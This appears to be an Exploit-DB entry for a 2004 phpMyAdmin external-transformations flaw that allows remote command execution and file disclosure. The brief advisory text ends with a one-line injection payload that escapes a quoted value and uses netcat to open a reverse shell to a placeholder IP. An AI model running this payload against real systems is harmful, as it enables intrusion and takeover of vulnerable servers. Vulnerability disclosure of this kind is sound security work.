phpMyAdmin 2.x - External Transformations Remote Command Execution

EDB-ID:

24817


Platform:

PHP

Published:

2004-12-13

source: http://www.securityfocus.com/bid/11886/info

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

F\';nc -e /bin/sh $IP 80;echo \'A